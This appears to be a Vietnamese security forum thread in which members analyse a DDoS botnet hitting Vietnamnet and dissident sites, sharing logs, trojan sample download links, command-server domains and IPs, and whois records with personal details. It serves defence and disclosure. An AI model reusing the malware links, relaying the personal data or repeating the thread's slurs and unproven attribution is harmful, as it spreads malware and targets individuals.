Để kiểm tra máy tính của mình có bị nhiễm virus của nhóm hacker Sinh Tử Lệnh hay không và được hỗ trợ diệt trừ các virus này, các bạn có thể gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho bolzano_1989 theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/
Đây là 3 file lần lượt theo thứ tự trên kiểm tra giùm em với có bị nhiễm virut ko thanks. http://www.mediafire.com/?9qb9w359wqaoco6 http://www.mediafire.com/?q0zfn30rcnehias http://www.mediafire.com/?cqqul3dk23blwrw

Các file log của máy bạn đều ổn ;) . Máy tính của bạn có kết nối tự động đến website nào trong các website sau không?

1. http://danlambaovn.blogspot.com 2. http://www.aihuuphuyen.org 3. http://nguoiduatinkami.wordpress.com 4. http://vrvradio.com 5. http://aotrangoi.com 6. http://viettan.org 7. http://dangviettan.wordpress.com 8. http://radiochantroimoi.com 9. http://radiochantroimoi.wordpress.com 10. http://vietnamnet.vn 11.

Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn — GMT

Hôm nay em nhận được email của Avira: Dear Sir or Madam, Thank you for your email to Avira's virus lab. Tracking number: INC00807098. A listing of files alongside their results can be found below: File ID Filename Size (Byte) Result 26259831 SbieSvc.exe 43 KB CLEAN Please find a detailed report concerning each individual sample below: Filename Result SbieSvc.exe CLEAN The file 'SbieSvc.exe' has been determined to be 'CLEAN'.Our analysts did not discover any malicious content. Alternatively you can see the analysis result here: http://analysis.avira.com/samples/details.php?uniqueid=8p5gphI11Ydy4IRxYOwTpZ1fpEjW0j8p&incidentid=807098 An overview of all your submissions can be found here: http://analysis.avira.com/samples/details.php?uniqueid=8p5gphI11Ydy4IRxYOwTpZ1fpEjW0j8p Please note: If you have specific questions please address them to support@avira.com Kind regards Avira Virus Lab Thời điểm giờ em không vào được http://vietnamnet.vn/ . Có ai vô được không mọi người? Em dùng mạng FPT.

Phân tích tính chất vài trận DDoS HVA vừa qua.

cayaoanh830 — GMT

vndncn wrote:

Thời điểm giờ em không vào được http://vietnamnet.vn/ . Có ai vô được không mọi người? Em dùng mạng FPT.

Vào được nhưng chậm.

Phân tích tính chất vài trận DDoS HVA vừa qua.

hailua_online — GMT

bolzano_1989 wrote:

hailua_online wrote:

bolzano_1989 wrote:

Để kiểm tra máy tính của mình có bị nhiễm virus của nhóm hacker Sinh Tử Lệnh hay không và được hỗ trợ diệt trừ các virus này, các bạn có thể gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho bolzano_1989 theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/
Đây là 3 file lần lượt theo thứ tự trên kiểm tra giùm em với có bị nhiễm virut ko thanks. http://www.mediafire.com/?9qb9w359wqaoco6 http://www.mediafire.com/?q0zfn30rcnehias http://www.mediafire.com/?cqqul3dk23blwrw
Các file log của máy bạn đều ổn ;) . Máy tính của bạn có kết nối tự động đến website nào trong các website sau không?
1. http://danlambaovn.blogspot.com 2. http://www.aihuuphuyen.org 3. http://nguoiduatinkami.wordpress.com 4. http://vrvradio.com 5. http://aotrangoi.com 6. http://viettan.org 7. http://dangviettan.wordpress.com 8. http://radiochantroimoi.com 9. http://radiochantroimoi.wordpress.com 10. http://vietnamnet.vn 11.

Máy em chỉ tự động vào mỗi thôi ạ

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

bolzano_1989 wrote:

Bạn đừng gửi log Autoruns ở máy tính của bạn nữa, mà gửi 2 log sau cho mình OTL và OTS, bạn hãy bật tất cả những gì mà bạn vừa sử dụng khi nãy, tái lập lại hiện tượng kết nối đến các website lạ kia rồi scan và gửi log: Hướng dẫn scan và gửi log OTL http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-otl/ Hướng dẫn scan và gửi log OTS http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-ots/ Mình tin là máy tính của bạn không bị nhiễm virus của nhóm STL ;) . Mình thấy có một khả năng lớn là có máy tính khác trong cùng mạng nội bộ của bạn bị nhiễm virus STL hoặc là một số người trong cùng mạng của bạn đang vào website viettan.org . Tốt nhất là bạn scan và gửi log Autoruns và Autorunsc ở tất cả các máy đang chạy trong cùng mạng khi xảy ra hiện tượng này cho mình, nhớ đánh số để phân biệt các log cùng máy tính đi kèm và việc truy tìm mẫu virus thuận tiện cho bạn :) .

Em đã send log OTL và OTS qua email của anh rồi. Em dùng Wifi chùa :D tự dưng nhắm mắt mơ mơ màng màng đoán được cái wifi hàng xóm để dùng :D đỡ tốn tiền mạng :D nên chắc là không thể scan các máy khác cho anh được. thôi thì thằng khác bị kệ nó vậy :-< chạy sang nhà nó nó lại tắt wifi đi thì khổ :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Sáng nay, kiểm tra lại thử target DDOS của mấy anh stl, thấy mấy anh đã loại danlambao.blogspot.vn ra khỏi danh sách. Tới giờ, content của backgrounds.jpg: http://net.iadze.com/backgrounds.jpg và showthread.php: http://net.iadze.com/showthread.php đã hoàn toàn giống nhau. Danh sách các site đang bị DDOS: Code:

http://www.aihuuphuyen.org
 http://nguoiduatinkami.wordpress.com
 http://vrvradio.com
 http://aotrangoi.com
 http://viettan.org
 http://dangviettan.wordpress.com
 http://radiochantroimoi.com
 http://radiochantroimoi.wordpress.com
 http://chutungo.wordpress.com
 http://nguoivietphanlan.forumotion.com
 http://exodusforvietnam.wordpress.com

Sao không đốt danlambao nữa mấy anh ? Chán rồi à ! Hiện tại, sau khi kiểm tra các file GoogleCrashHandler.exe và dll mà các bạn gởi lên, tôi tạm xác định đấy là các file sạch của Google, và xin lỗi các bạn. Nếu các bạn kiểm tra các file đó có Digital Signature của Google thì có thể "tạm" yên tâm, không cần upload. Vậy là tới đây chúng ta vẫn chưa tìm được mẫu đang ddos Vietnamnet. Mong bà con tiếp tục dùng TCPView và SmartSniff: http://www.nirsoft.net/utils/smsniff.html để tiếp tục monitor và tìm exe nào đang ddos Vietnamnet. PS: 2 hailua_online: Cậu up giùm tôi các file này nhé: 1. c:\program files\common files\adobe\switchboard\switchboard.exe 2. c:\program files\internet download manager\idman.exe Cảm ơn trước.

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

Ngưng vì đốt Google thì chỉ có nhận phần thua, STL là cái j mà đòi đập Google =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

1visao — GMT

chắc đây là mẫu mới của đám Malware Sinh tử lệnh, TQN cần file gì để mình gửi dùng tcpview bắt được .

chuyển qua proxy thì thấy liên tục gửi request đến địa chỉ vietnamnet

Địa chỉ download file ituneshelp http://www.mediafire.com/?my3ge2sqvnlno76 13:20 pm , sau khi post bài này đã ngưng gửi request tới Vietnamnet , thêm vào đó thấy được mấy địa chỉ lạ http://daily.leteaks.com/index.txt? http://wide.ircop.cn/index.txt? http://pref.firebay.cn/index.txt? http://link.susaks.com/index.txt? 2 bolzano_1989: đây là mấy file log lấy được bằng cách scan OTL , OTS . http://www.mediafire.com/?5rh2d5a4yhtdh2h

Phân tích tính chất vài trận DDoS HVA vừa qua.

hailua_online — GMT

TQN wrote:

Sáng nay, kiểm tra lại thử target DDOS của mấy anh stl, thấy mấy anh đã loại danlambao.blogspot.vn ra khỏi danh sách. Tới giờ, content của backgrounds.jpg: http://net.iadze.com/backgrounds.jpg và showthread.php: http://net.iadze.com/showthread.php đã hoàn toàn giống nhau. Danh sách các site đang bị DDOS: Code:
http://www.aihuuphuyen.org
 http://nguoiduatinkami.wordpress.com
 http://vrvradio.com
 http://aotrangoi.com
 http://viettan.org
 http://dangviettan.wordpress.com
 http://radiochantroimoi.com
 http://radiochantroimoi.wordpress.com
 http://chutungo.wordpress.com
 http://nguoivietphanlan.forumotion.com
 http://exodusforvietnam.wordpress.com
Sao không đốt danlambao nữa mấy anh ? Chán rồi à ! Hiện tại, sau khi kiểm tra các file GoogleCrashHandler.exe và dll mà các bạn gởi lên, tôi tạm xác định đấy là các file sạch của Google, và xin lỗi các bạn. Nếu các bạn kiểm tra các file đó có Digital Signature của Google thì có thể "tạm" yên tâm, không cần upload. Vậy là tới đây chúng ta vẫn chưa tìm được mẫu đang ddos Vietnamnet. Mong bà con tiếp tục dùng TCPView và SmartSniff: http://www.nirsoft.net/utils/smsniff.html để tiếp tục monitor và tìm exe nào đang ddos Vietnamnet. PS: 2 hailua_online: Cậu up giùm tôi các file này nhé: 1. c:\program files\common files\adobe\switchboard\switchboard.exe 2. c:\program files\internet download manager\idman.exe Cảm ơn trước.

Hai file đó nằm trong này anh. http://www.mediafire.com/?b8t7784kbhaub4d

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

Mình vừa load về check, viustotal có mỗi Kaspersky nhận diện: Kaspersky 9.0.0.837 2011.08.25 Trojan.Win32.Diple.acxu Tra thông tin về chú này: Threat Name Trojan.Win32.Diple Category TrojanCategory information Level HighLevel information Advice Remove Description Release Date Feb 11 2011 Last Updated Feb 11 2011

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

1visao wrote:

chắc đây là mẫu mới của đám Malware Sinh tử lệnh, TQN cần file gì để mình gửi dùng tcpview bắt được . chuyển qua proxy thì thấy liên tục gửi request đến địa chỉ vietnamnet Địa chỉ download file ituneshelp http://www.mediafire.com/?my3ge2sqvnlno76 13:20 pm , sau khi post bài này đã ngưng gửi request tới Vietnamnet , thêm vào đó thấy được mấy địa chỉ lạ http://daily.leteaks.com/index.txt? http://wide.ircop.cn/index.txt? http://pref.firebay.cn/index.txt? http://link.susaks.com/index.txt?

Ha ha, hoan hô 1visao =D) Cái này là đích thị con nai vàng tấn công vietnamnet rồi. Sẽ cập nhật thêm thông tin. Các bạn CMC có bị đám bot tấn công không? Có IP (cho leased line) nào là 183.91.14.15 và 183.91.14.15 của CMCTI.vn đang sử dụng mà bị đập không? Thêm: Hoá ra 183.91.14.15 thuộc infrastructure của CMCTI.vn và IP này dùng để host tuanvietnam.vietnamnet.vn. Còn 183.91.14.11 thì host vef.vn. Ngoài ra, vietnamnet.vn bị đánh vào 2 IP khác nhau (2 A records: 123.30.133.166 và 117.103.197.249). Còn vietnamweek.net host ở bên Mỹ (209.160.52.52) cũng chịu chung số phận. Botnet này đánh vô tất cả các sites quan trọng của vietnamnet. Cập nhật: Tất cả zombies của botnet này hiện trỏ về master ở 200.74.244.198. IP này thuộc Panama. Nếu cần chặn, vncert có thể phối hợp các ISP để chặn ngay trên ISP level. Hiện giờ chỉ có mỗi Kaspersky nhận diện con trojan này là: Trojan.Win32.Diple.acxu. PS: sẵn tiện thông báo luôn cho công luận biết là nhóm thành viên HVA lộ diện trong việc phân tích và truy tìm malware của stl thường xuyên bị đe doạ bằng nhiều cách khác nhau. Hành vi phạm pháp và vô đạo đức bằng kỹ thuật nay bắt đầu chuyển sang hướng đe doạ. Xin thông báo để bà con rõ mức độ tồi tệ của sự việc.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Mình cũng đang ngờ ngợ: 1. Down của 1visao về, KIS chụp cổ hết. 2. Bạn 1visao join HVA từ 12/06/2004, tới giờ mới chỉ có 1 bài post. Dù gì, cũng cảm ơn 1visao. Đang analyze nó, tạm tắt KIS.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

http://daily.leteaks.com/index.txt? http://wide.ircop.cn/index.txt? http://pref.firebay.cn/index.txt? http://link.susaks.com/index.txt? 4 cái domain này dns vào afraid.org và sitelutions.com như mấy con domain trước của STL 3 em đều trong tình trạng clientTransferProhibited riêng em firebay.cn thì có chút info

Domain Name: firebay.cn ROID: 20080211s10001s67686910-cn Domain Status: ok Registrant ID: ct2vkafo9jfsvst Registrant Organization: 许士鎏 ( Liu, Xu Shi ) Registrant Name: 许士鎏 ( Liu, Xu Shi ) Registrant Email: stan@canadaad.com Sponsoring Registrar: 北京新网互联科技有限公司 ( Beijing Innovative Linkage Technology Co., Ltd. ) Name Server:ns1.dns.com.cn Name Server:ns2.dns.com.cn Name Server:ns2.afraid.org Name Server:ns1.afraid.org Registration Date: 2008-02-11 11:39:41 Expiration Date: 2012-02-11 11:39:41 Dnssec Deployment: N

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

whois thằng canadaad.com

Registrant: SHILIU XU @mocis.com +1.4167321430 MOCIS INC. SUITE 507, 45 GRENOBLE DR. NORTH YORK,ONTARIO,CA M3C 1C4 Domain Name:canadaad.com Record last updated at 2010-11-01 12:45:14 Record created on 2002/1/17 Record expired on 2012/1/17 Domain servers in listed order: ns1.dns-diy.net ns2.dns-diy.net Billing Contactor: name: SHILIU XU mail: @mocis.com tel: +1.4167321430 org: MOCIS INC. address: SUITE 507, 45 GRENOBLE DR. city: NORTH YORK ,province: ONTARIO ,country: CA postcode: M3C 1C4

whois nốt mocis.com

Registrant: shiliu xu @public.guangzhou.gd.cn +1.4167321430 MOCIS INC. SUITE 507, 45 GRENOBLE DR. TORONTO,ONTARIO,CA M3C 1C4 Domain Name:mocis.com Record last updated at 2011-05-27 15:17:06 Record created on 2004/7/9 Record expired on 2012/7/9

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

http://www.virustotal.com/file-scan/report.html?id=ea8ed86c2ef87da60d096025291d5d517b397a3c95e8354f5a2fb96eb7a5132d-1314261104 Mấy cái files này bị một đống trình AVs phát hiện rồi mà.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Hello 1visao, Nhờ 1visao tìm trên máy xem có cái "WS2_32.dll" không? Nếu có vui lòng upload lên giúp luôn nha? Cám ơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

conmale wrote:

1visao wrote:

chắc đây là mẫu mới của đám Malware Sinh tử lệnh, TQN cần file gì để mình gửi dùng tcpview bắt được . chuyển qua proxy thì thấy liên tục gửi request đến địa chỉ vietnamnet Địa chỉ download file ituneshelp http://www.mediafire.com/?my3ge2sqvnlno76 13:20 pm , sau khi post bài này đã ngưng gửi request tới Vietnamnet , thêm vào đó thấy được mấy địa chỉ lạ http://daily.leteaks.com/index.txt? http://wide.ircop.cn/index.txt? http://pref.firebay.cn/index.txt? http://link.susaks.com/index.txt?
Ha ha, hoan hô 1visao =D) Cái này là đích thị con nai vàng tấn công vietnamnet rồi. Sẽ cập nhật thêm thông tin. Các bạn CMC có bị đám bot tấn công không? Có IP (cho leased line) nào là 183.91.14.15 và 183.91.14.15 của CMCTI.vn đang sử dụng mà bị đập không? Thêm: Hoá ra 183.91.14.15 thuộc infrastructure của CMCTI.vn và IP này dùng để host tuanvietnam.vietnamnet.vn. Còn 183.91.14.11 thì host vef.vn. Ngoài ra, vietnamnet.vn bị đánh vào 2 IP khác nhau (2 A records: 123.30.133.166 và 117.103.197.249). Còn vietnamweek.net host ở bên Mỹ (209.160.52.52) cũng chịu chung số phận. Botnet này đánh vô tất cả các sites quan trọng của vietnamnet. Cập nhật: Tất cả zombies của botnet này hiện trỏ về master ở 200.74.244.198. IP này thuộc Panama. Nếu cần chặn, vncert có thể phối hợp các ISP để chặn ngay trên ISP level. Hiện giờ chỉ có mỗi Kaspersky nhận diện con trojan này là: Trojan.Win32.Diple.acxu. PS: sẵn tiện thông báo luôn cho công luận biết là nhóm thành viên HVA lộ diện trong việc phân tích và truy tìm malware của stl thường xuyên bị đe doạ bằng nhiều cách khác nhau. Hành vi phạm pháp và vô đạo đức bằng kỹ thuật nay bắt đầu chuyển sang hướng đe doạ. Xin thông báo để bà con rõ mức độ tồi tệ của sự việc.

Khi unrar con iTunes.rar ta có 4 files: data.mdf iTunesHelper-tray.exe iTunesHelper.exe ITUNESHELPER.EXE-2BE8106E.pf Thì thưc ra file data.mdf mới bị detect là 1 Trojan. Avira cũng đã detect nó là Trojan TR/Diple.acju Nhưng tôi lại nghi thành phần chính của DDoS tool là file iTunesHelper.exe cơ! Đang thử nghiệm thưc tế.

Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 — GMT

Em vừa submit file ituneshelper.exe lên web của: Symantec, McAfee, Nod32, Microsoft, Avast, AVG, Bitdefender. Em tự hỏi chúng ta có nên liên lạc với danlambaovn nhờ họ thông báo rộng rãi cho đọc giả giúp submit các file nhiễm trojan STL lên các website của các chương trình antivirus không?

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

weasel1026789 wrote:

Em vừa submit file ituneshelper.exe lên web của: Symantec, McAfee, Nod32, Microsoft, Avast, AVG, Bitdefender. Em tự hỏi chúng ta có nên liên lạc với danlambaovn nhờ họ thông báo rộng rãi cho đọc giả giúp submit các file nhiễm trojan STL lên các website của các chương trình antivirus không?

Ta nên kiểm tra kỹ hơn và cũng nên kiểm tra trong thưc tế, khi có kết quả chính xác thì thông báo cũng kịp

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

1visao gửi thêm 2 log Autoruns, Autorunsc (Autoruns command-line) cho mình theo đúng hướng dẫn ở các bài viết sau nhé: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Giờ mình phải đi đến tối khuya, khi về mình sẽ xem cho bạn ngay, bạn chịu khó đừng xóa virus bằng bất cứ công cụ hay phần mềm nào nhé ;) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Đặc sệt code của stl coder, CString + zlib + encode tá lã. Lần này, mấy anh lại đi ăn cắp code nữa rồi mấy anh, libcurl chơi bê nguyên xi vậy à ? Hay là bản chất đại ca tàu khựa của mấy anh ăn cắp quen rồi nên mấy anh chỉ biết dùng đồ ăn cắp hay nhiểm ăn cắp luôn rồi. Em gặp nhiều "mèo què" rồi, nhưng chưa bao giờ gặp đám "mèo què" nào như của tụi anh, đạo code, mạo danh các ct nổi tiếng. Hèn, hèn, hèn hạ hết chổ nói. Đx, chỉ biết nói thêm một câu, "khốn nạn", nhưng nói rồi thấy hình như chưa đủ "đô". Em tức quá chửi luôn: bà con cẩn thận, tụi stl này giãy giụa, vùng vẫy, cắn càn như một đám chó điên rồi bị người dân dồn và đập rồi, ai đụng tới tụi nó thì tụi nó hết trò, chỉ biết ddos đáp trả thôi. Run nó lên, nó sleep một đỗi rồi bắt đầu ồ ạt tấn công liền 1 loạt 3 địa chỉ của Vietnamet. Em đang rce đoạn code giải mã file .txt của nó.

Phân tích tính chất vài trận DDoS HVA vừa qua.

sonngh — GMT

Xem trên TCPView nó báo như vầy :

Mình đang vào HVA không mở thêm 1 tab nào khác .

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Thằng coder của con fake ITunes này là coder C++, chỉ quen dùng C++ ATL/MFC string, trong khi toàn bộ source của libcurl là pure C. Avira đã có trả lời, mới up hồi chiều, nhanh thật: http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=809945 Bạn 1visao vui lòng up giùm file Autoruns của bạn, vì chắc chắn trên máy bạn còn 1 thằng nằm vùng khác download ituneshelper.exe về. File data.mdf cũng chính là ituneshelper.exe nhưng có version cũ hơn. Tức là lúc đầu con nằm vùng đó download ituneshelper.exe ver cũ về, sau đó một thời gian, nó kết nối tới đâu đó, thấy có lệnh cập nhật, nó down ituneshelper.exe mới về, kill process ituneshelper.exe cũ, rename, copy ituneshelper.exe mới vào thư mục ban đầu rồi run, đăng ký autorun. Và sẽ có một website nào đó nữa ta chưa biết chứa con trojan và file ra lệnh cập nhật này. PS: Em nói đúng không mấy anh stl. RCE code mấy anh riết ngán quá rồi :-(

Phân tích tính chất vài trận DDoS HVA vừa qua.

totden — GMT

TQN wrote:

Thằng coder của con fake ITunes này là coder C++, chỉ quen dùng C++ ATL/MFC string, trong khi toàn bộ source của libcurl là pure C.

em không biết nó vô ý hay cố tình chứ em thấy code lần này khó đọc vãi ... ;))

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Đúng 100% iTunesHelper.exe là DDoS tool của STL. Nó tấn công khá nhanh và khá manh, liên tục vào 7 IP, đều là của vietnamnet.vn. Nghĩa là nó tấn công toàn bộ kết cấu hạ tầng của vietnamnet.vn, từ các webserver đến các Route. Kinh khủng và liều mạng. Mấy cậu nhóc VN thì đâu có kiến thức về kết cấu hạ tầng mạng để có thể tấn công như vậy. Các bác VN nhiều tuổi, giỏi và có kinh nghiệm về IT Network thì có cho kẹo cũng không dám làm, vì vietnamnet.vn là tờ báo mạng lớn và quan trọng của nhà nước, động vào là rất phiền. Chỉ có các bác Khựa ngang ngược, ỷ thế nước lớn, coi VN không ra gì, mới làm như vậy. Báo cao khảo sát thưc tế đã xong, đang hoàn tất thêm chút ít (chủ yếu là xem lai kết cấu hạ tầng mạng của vietnamnet.vn) và sẽ post lên.

Phân tích tính chất vài trận DDoS HVA vừa qua.

tanviet12 — GMT

Chắc chắn là của mấy bác Tàu. Vietnamnet luôn có những bài viết sau sắc và "lớn tiếng" với tụi Tàu.. Nên nó lại muốn dập đây mà. Hiện tại (10:19 25/08/2011) thì chỉ có tuanvietnam là vào được :(

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

2 totden: Dĩ nhiên rồi, code C++ mà dùng WTL, ATL, MFC, std, boost thì RCE cực bỏ xừ. Nhưng nếu quen và đã từng code, debug trên các library đó thì sẽ dể dàng hơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

vnchampion — GMT

Chào các bác ! :( Trời ạ, Hôm nay em mới seach từ Khoá Unikey nethoabinh Hiện tại trang web nethoabinh.com là trang web của em :) Thực sự em đọc topic này mà rùng rợn người. Từ trước tới nay em cài bao nhiêu phần mêm viruts quét rùi mà file unikey em tải lên là File sạch Giờ lại thấy các bác báo cáo thế, Em lại update và quét thì quả thật có báo http://www.virustotal.com/file-scan/report.html?id=298452c3c9f0c638bea809bb8d4d890c6802272a5cc0aac7064531bbae98627e-1314287130 Em không biết một tí gì vì em load trực tiếp trên trang chủ của Unikey.org ???? Rùi update lại cho anh em dùng thôi - Giờ lại ra thế này thì em cũng chả biết phải tin vào ai bây giờ :(. Nếu đợt tấn công vừa rồi là nguyên nhân do file unikey của bên em phát tán thì em thật sự xin lỗi và Em thề là không biết một tí gì vì tin tưởng load trên trang chủ và quét các phần mềm diệt viruts rùi Em xin cảm ơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

TQN wrote:

Thằng coder của con fake ITunes này là coder C++, chỉ quen dùng C++ ATL/MFC string, trong khi toàn bộ source của libcurl là pure C. Avira đã có trả lời, mới up hồi chiều, nhanh thật: http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=809945 Bạn 1visao vui lòng up giùm file Autoruns của bạn, vì chắc chắn trên máy bạn còn 1 thằng nằm vùng khác download ituneshelper.exe về. File data.mdf cũng chính là ituneshelper.exe nhưng có version cũ hơn. Tức là lúc đầu con nằm vùng đó download ituneshelper.exe ver cũ về, sau đó một thời gian, nó kết nối tới đâu đó, thấy có lệnh cập nhật, nó down ituneshelper.exe mới về, kill process ituneshelper.exe cũ, rename, copy ituneshelper.exe mới vào thư mục ban đầu rồi run, đăng ký autorun. Và sẽ có một website nào đó nữa ta chưa biết chứa con trojan và file ra lệnh cập nhật này. PS: Em nói đúng không mấy anh stl. RCE code mấy anh riết ngán quá rồi :-(

Master webserver có thể là một trong 2 webserver này: www.rackspace.com IP 207.97.209.147, đặt tai Mesa, AZ, United States host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (không xác định được tỉnh nào?) Hiện nay chưa có thời gian check để xác định cụ thể là webserver nào? Vừa qua cũng chưa thấy có kết nôi download file từ webserver đến máy nạn nhân (client). Riêng việc các bác "16 chữ vàng" đặt và vận hành được webserver ở tận Panama thì quả thật em phải ngả mũ cúi chào. Chỉ có nước các bác lắm tiền, nhiều quân thì mới đủ sức đầu tư đến tận châu Phi, châu Mỹ Latinh. Chắc nước VN chúng em thì chịu.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

vnchampion wrote:

Chào các bác ! :( Trời ạ, Hôm nay em mới seach từ Khoá Unikey nethoabinh Hiện tại trang web nethoabinh.com là trang web của em :) Thực sự em đọc topic này mà rùng rợn người. Từ trước tới nay em cài bao nhiêu phần mêm viruts quét rùi mà file unikey em tải lên là File sạch Giờ lại thấy các bác báo cáo thế, Em lại update và quét thì quả thật có báo http://www.virustotal.com/file-scan/report.html?id=298452c3c9f0c638bea809bb8d4d890c6802272a5cc0aac7064531bbae98627e-1314287130 Em không biết một tí gì vì em load trực tiếp trên trang chủ của Unikey.org ???? Rùi update lại cho anh em dùng thôi - Giờ lại ra thế này thì em cũng chả biết phải tin vào ai bây giờ :(. Nếu đợt tấn công vừa rồi là nguyên nhân do file unikey của bên em phát tán thì em thật sự xin lỗi và Em thề là không biết một tí gì vì tin tưởng load trên trang chủ và quét các phần mềm diệt viruts rùi Em xin cảm ơn.

Không! File Unikey của em upload lên website của em (nethoabinh.com) là file Unikey sạch mà. Anh đã kiểm tra kỹ và đã có báo cáo chi tiết trong topic này (ở các trang đầu topic). Unikey này bạn lequi download về, nghi là có virus, nhưng thưc tế là file sạch, chạy tốt.

Phân tích tính chất vài trận DDoS HVA vừa qua.

vnchampion — GMT

PXMMRF wrote:

vnchampion wrote:

Chào các bác ! :( Trời ạ, Hôm nay em mới seach từ Khoá Unikey nethoabinh Hiện tại trang web nethoabinh.com là trang web của em :) Thực sự em đọc topic này mà rùng rợn người. Từ trước tới nay em cài bao nhiêu phần mêm viruts quét rùi mà file unikey em tải lên là File sạch Giờ lại thấy các bác báo cáo thế, Em lại update và quét thì quả thật có báo http://www.virustotal.com/file-scan/report.html?id=298452c3c9f0c638bea809bb8d4d890c6802272a5cc0aac7064531bbae98627e-1314287130 Em không biết một tí gì vì em load trực tiếp trên trang chủ của Unikey.org ???? Rùi update lại cho anh em dùng thôi - Giờ lại ra thế này thì em cũng chả biết phải tin vào ai bây giờ :(. Nếu đợt tấn công vừa rồi là nguyên nhân do file unikey của bên em phát tán thì em thật sự xin lỗi và Em thề là không biết một tí gì vì tin tưởng load trên trang chủ và quét các phần mềm diệt viruts rùi Em xin cảm ơn.
Không! File Unikey của em upload lên website của em (nethoabinh.com) là file Unikey sạch mà. Anh đã kiểm tra kỹ và đã có báo cáo chi tiết trong topic này (ở các trang đầu topic). Unikey này bạn lequi download về, nghi là có virus, nhưng thưc tế là file sạch, chạy tốt.

Dạ vâng anh nói em yên tâm hơn rùi :( Lâu lắm em mới vào lại HVA #:S nên giờ mà có mệnh hệ gì em cũng buồn lắm

Phân tích tính chất vài trận DDoS HVA vừa qua.

vnchampion — GMT

texudo wrote:

2 trang YeuHoaBinh.com và NetHoaBinh.com có rank là 682 và 688 (theo thứ tự các website ViệtNam) trên Alexa. Và...việc tìm kiếm tới UniKey luôn đứng đầu 2 site này...chứng tỏ bà còn Việt bị nhiễm malware hơi nhiều. http://www.alexa.com/siteinfo/nethoabinh.com http://www.alexa.com/siteinfo/yeuhoabinh.com Một điều đáng ngạc nhiên là như lequi nói: Khi search google về Flash Player download thì NETHOABINH.COM đứng trong top đầu mới kinh. Tuy nhiên link tới mediafire.com đã bị delete, ai có file Flash Player này thì tốt quá. Mà cái bạn "LAM VOI" trên NETHOABINH có vẻ hâm mộ TQ quá, avatar là anh LÝ THÀNH LONG, lại còn học tiếng Trung Quốc.... @lequi: check traffic qua nettop cho các domain mà bạn đưa ra thì hầu hết là ZERO, và các domain này vừa mới được thiết lập (vào khoảng thời gian đầu tháng 7).

Chào Bạn mình là Admin của nethoabinh.com Nay tình cờ vào xem topic này Mình xin được tích cực tham gia nếu các phần mềm của mình bị dính các phần mềm đó thì Mình sẽ gỡ sạch và tạ lội với anh em Vì thực sự mình cũng hơi chủ quan Mình xin gửi bạn 4 File flash mình update trên nethoabinh và 1 file unikey Link dơnload: http://nethoabinh.com/data/flash-nethoabinh.com.zip @ Lâm voi: là tớ , và ảnh avartar là ảnh của tớ, Chỉ là thích lý tiểu long nên học Côn thôi. Yêu lý tiểu long nhưng Ghét Khựa :). Không cùng quan điểm đâu nhé

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

@anh PXMMRF host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (không xác định được tỉnh nào?) Nó nằm ở Panama City luôn anh à, thủ đô của nó là Panama luôn theo suy luận của em chắc là 200.74.244.198 vì có cái nginx quen thuộc

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

